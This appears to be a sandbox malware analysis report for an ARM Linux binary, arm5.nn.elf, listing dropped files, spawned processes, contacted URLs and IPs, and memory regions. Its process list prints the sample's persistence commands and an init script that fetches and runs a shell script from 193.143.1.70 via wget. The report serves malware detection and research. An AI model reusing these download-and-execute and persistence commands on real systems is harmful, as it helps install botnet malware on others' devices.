Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
arm5.nn.elf
|
ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
|
initial sample
|
 |
|
|
/etc/init.d/arm5.nn.elf
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/init.d/system
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/profile
|
ASCII text
|
dropped
|
|
|
|
/etc/rc.local
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/boot/bootcmd
|
ASCII text
|
dropped
|
||
|
/etc/inittab
|
ASCII text
|
dropped
|
||
|
/etc/motd
|
ASCII text
|
dropped
|
||
|
/etc/systemd/system/custom.service
|
ASCII text
|
dropped
|
||
|
/memfd:snapd-env-generator (deleted)
|
ASCII text
|
dropped
|
||
|
/tmp/qemu-open.OMSXAo (deleted)
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
/tmp/arm5.nn.elf
|
/tmp/arm5.nn.elf
|
||
|
/tmp/arm5.nn.elf
|
-
|
||
|
/tmp/arm5.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "systemctl enable custom.service >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/systemctl
|
systemctl enable custom.service
|
||
|
/tmp/arm5.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/system
|
||
|
/tmp/arm5.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/system /etc/rcS.d/S99system
|
||
|
/tmp/arm5.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm5.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm5.nn.elf'\n /tmp/arm5.nn.elf
&\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping
arm5.nn.elf'\n killall arm5.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0
{start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm5.nn.elf"
|
||
|
/tmp/arm5.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/arm5.nn.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/arm5.nn.elf
|
||
|
/tmp/arm5.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/mkdir
|
mkdir -p /etc/rc.d
|
||
|
/tmp/arm5.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/arm5.nn.elf /etc/rc.d/S99arm5.nn.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/arm5.nn.elf /etc/rc.d/S99arm5.nn.elf
|
||
|
/tmp/arm5.nn.elf
|
-
|
||
|
/tmp/arm5.nn.elf
|
-
|
||
|
/tmp/arm5.nn.elf
|
-
|
||
|
/tmp/arm5.nn.elf
|
-
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
|
||
|
/usr/libexec/gsd-housekeeping
|
/usr/libexec/gsd-housekeeping
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
There are 41 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://193.143.1.70/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbi
|
unknown
|
||
|
http://193.143.1.70/curl.sh
|
unknown
|
||
|
http://193.143.1.70/lol.sh
|
unknown
|
||
|
http://193.143.1.70/
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
212.121.224.49
|
unknown
|
Spain
|
||
|
215.212.223.170
|
unknown
|
United States
|
||
|
129.124.228.16
|
unknown
|
United States
|
||
|
80.203.20.241
|
unknown
|
Norway
|
||
|
171.177.107.238
|
unknown
|
United States
|
||
|
77.238.197.247
|
unknown
|
Bosnia and Herzegowina
|
||
|
34.59.120.244
|
unknown
|
United States
|
||
|
169.250.200.178
|
unknown
|
United States
|
||
|
213.132.40.53
|
unknown
|
United Arab Emirates
|
||
|
54.197.209.137
|
unknown
|
United States
|
||
|
148.249.87.237
|
unknown
|
Mexico
|
||
|
161.253.196.99
|
unknown
|
United States
|
||
|
143.226.80.195
|
unknown
|
United States
|
||
|
177.248.66.233
|
unknown
|
Mexico
|
||
|
135.29.246.106
|
unknown
|
United States
|
||
|
68.191.19.168
|
unknown
|
United States
|
||
|
53.166.67.150
|
unknown
|
Germany
|
||
|
147.68.231.150
|
unknown
|
United Kingdom
|
||
|
16.73.75.2
|
unknown
|
United States
|
||
|
61.19.47.167
|
unknown
|
Thailand
|
||
|
181.104.254.234
|
unknown
|
Argentina
|
||
|
82.217.99.98
|
unknown
|
Netherlands
|
||
|
16.159.182.156
|
unknown
|
United States
|
||
|
189.150.86.64
|
unknown
|
Mexico
|
||
|
145.63.29.231
|
unknown
|
Netherlands
|
||
|
74.220.154.155
|
unknown
|
United States
|
||
|
143.244.171.42
|
unknown
|
United States
|
||
|
32.198.11.90
|
unknown
|
United States
|
||
|
164.121.20.89
|
unknown
|
United States
|
||
|
18.180.184.65
|
unknown
|
United States
|
||
|
184.112.12.164
|
unknown
|
United States
|
||
|
212.96.118.214
|
unknown
|
Russian Federation
|
||
|
86.168.6.132
|
unknown
|
United Kingdom
|
||
|
142.68.132.209
|
unknown
|
Canada
|
||
|
105.76.36.198
|
unknown
|
Morocco
|
||
|
26.69.62.247
|
unknown
|
United States
|
||
|
2.82.37.231
|
unknown
|
Portugal
|
||
|
60.79.229.129
|
unknown
|
Japan
|
||
|
18.92.85.232
|
unknown
|
United States
|
||
|
163.251.20.208
|
unknown
|
United States
|
||
|
162.121.178.85
|
unknown
|
United States
|
||
|
152.18.53.32
|
unknown
|
United States
|
||
|
3.188.34.247
|
unknown
|
United States
|
||
|
2.232.202.229
|
unknown
|
Italy
|
||
|
174.124.113.223
|
unknown
|
United States
|
||
|
110.53.169.116
|
unknown
|
China
|
||
|
53.113.143.168
|
unknown
|
Germany
|
||
|
181.199.231.99
|
unknown
|
Guyana
|
||
|
133.246.103.215
|
unknown
|
Japan
|
||
|
156.216.243.176
|
unknown
|
Egypt
|
||
|
13.105.41.112
|
unknown
|
United States
|
||
|
51.131.18.186
|
unknown
|
United States
|
||
|
76.114.251.116
|
unknown
|
United States
|
||
|
2.65.208.159
|
unknown
|
Sweden
|
||
|
141.91.250.190
|
unknown
|
Germany
|
||
|
157.28.104.112
|
unknown
|
Italy
|
||
|
157.73.179.68
|
unknown
|
Japan
|
||
|
193.143.1.70
|
unknown
|
unknown
|
||
|
179.205.182.59
|
unknown
|
Brazil
|
||
|
156.213.63.188
|
unknown
|
Egypt
|
||
|
39.95.39.94
|
unknown
|
China
|
||
|
144.103.78.154
|
unknown
|
United States
|
||
|
23.112.145.229
|
unknown
|
United States
|
||
|
154.228.169.14
|
unknown
|
Uganda
|
||
|
94.208.177.126
|
unknown
|
Netherlands
|
||
|
218.107.130.213
|
unknown
|
China
|
||
|
43.37.0.28
|
unknown
|
Japan
|
||
|
90.134.249.81
|
unknown
|
Sweden
|
||
|
153.42.84.12
|
unknown
|
United States
|
||
|
201.123.66.189
|
unknown
|
Mexico
|
||
|
149.37.218.125
|
unknown
|
United States
|
||
|
3.115.234.111
|
unknown
|
United States
|
||
|
196.86.195.44
|
unknown
|
Morocco
|
||
|
140.119.237.161
|
unknown
|
Taiwan; Republic of China (ROC)
|
||
|
181.151.232.107
|
unknown
|
Colombia
|
||
|
164.76.170.214
|
unknown
|
United States
|
||
|
106.36.47.122
|
unknown
|
China
|
||
|
7.222.183.186
|
unknown
|
United States
|
||
|
20.30.15.113
|
unknown
|
United States
|
||
|
174.109.251.228
|
unknown
|
United States
|
||
|
107.77.217.35
|
unknown
|
United States
|
||
|
34.54.85.173
|
unknown
|
United States
|
||
|
104.119.119.231
|
unknown
|
United States
|
||
|
85.255.183.26
|
unknown
|
Ukraine
|
||
|
185.210.9.8
|
unknown
|
Germany
|
||
|
14.172.55.92
|
unknown
|
Viet Nam
|
||
|
221.179.67.65
|
unknown
|
China
|
||
|
215.108.249.180
|
unknown
|
United States
|
||
|
207.45.177.113
|
unknown
|
United States
|
||
|
223.1.237.120
|
unknown
|
China
|
||
|
208.14.123.245
|
unknown
|
United States
|
||
|
213.112.204.255
|
unknown
|
Sweden
|
||
|
15.245.45.167
|
unknown
|
United States
|
||
|
18.69.84.38
|
unknown
|
United States
|
||
|
32.239.70.191
|
unknown
|
United States
|
||
|
148.61.226.149
|
unknown
|
United States
|
||
|
57.152.230.159
|
unknown
|
Belgium
|
||
|
192.96.209.227
|
unknown
|
United States
|
||
|
128.67.14.7
|
unknown
|
Italy
|
||
|
62.4.193.10
|
unknown
|
Belgium
|
There are 90 hidden IPs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7fa738032000
|
page execute read
|
|
||
|
7fa738032000
|
page execute read
|
|
||
|
7fa838021000
|
page read and write
|
|||
|
55a99c7c4000
|
page read and write
|
|||
|
7fa83f8d4000
|
page read and write
|
|||
|
7fa83ef04000
|
page read and write
|
|||
|
7fa83fbde000
|
page read and write
|
|||
|
7fa83fc47000
|
page read and write
|
|||
|
7fa83f8d4000
|
page read and write
|
|||
|
7ffd30652000
|
page read and write
|
|||
|
7fa83fc02000
|
page read and write
|
|||
|
55a99fe5f000
|
page read and write
|
|||
|
55a99e7c2000
|
page execute and read and write
|
|||
|
7fa73803e000
|
page read and write
|
|||
|
7fa73803e000
|
page read and write
|
|||
|
55a99c7bb000
|
page read and write
|
|||
|
7fa83f563000
|
page read and write
|
|||
|
7fa837fff000
|
page read and write
|
|||
|
7fa83e6fc000
|
page read and write
|
|||
|
7fa83f2f8000
|
page read and write
|
|||
|
7ffd30685000
|
page execute read
|
|||
|
55a99fe5f000
|
page read and write
|
|||
|
7fa83fab5000
|
page read and write
|
|||
|
7fa83f6f2000
|
page read and write
|
|||
|
7fa83f6f2000
|
page read and write
|
|||
|
7fa83f586000
|
page read and write
|
|||
|
7fa83e6fc000
|
page read and write
|
|||
|
55a99c7c4000
|
page read and write
|
|||
|
7fa83f586000
|
page read and write
|
|||
|
7fa83fbde000
|
page read and write
|
|||
|
7fa83f563000
|
page read and write
|
|||
|
7fa83fab5000
|
page read and write
|
|||
|
7fa738043000
|
page read and write
|
|||
|
7fa83ef96000
|
page read and write
|
|||
|
55a99c7bb000
|
page read and write
|
|||
|
7fa83ef96000
|
page read and write
|
|||
|
7ffd30652000
|
page read and write
|
|||
|
7ffd30685000
|
page execute read
|
|||
|
7fa83fc47000
|
page read and write
|
|||
|
55a99e7d9000
|
page read and write
|
|||
|
7fa83ef04000
|
page read and write
|
|||
|
7fa83fc02000
|
page read and write
|
|||
|
7fa83f2f8000
|
page read and write
|
|||
|
7fa73803a000
|
page read and write
|
|||
|
55a99c56a000
|
page execute read
|
|||
|
55a99e7d9000
|
page read and write
|
|||
|
7fa838021000
|
page read and write
|
|||
|
55a99e7c2000
|
page execute and read and write
|
|||
|
7fa837fff000
|
page read and write
|
|||
|
55a99c56a000
|
page execute read
|
|||
|
7fa73803a000
|
page read and write
|
There are 41 hidden memdumps, click here to show them.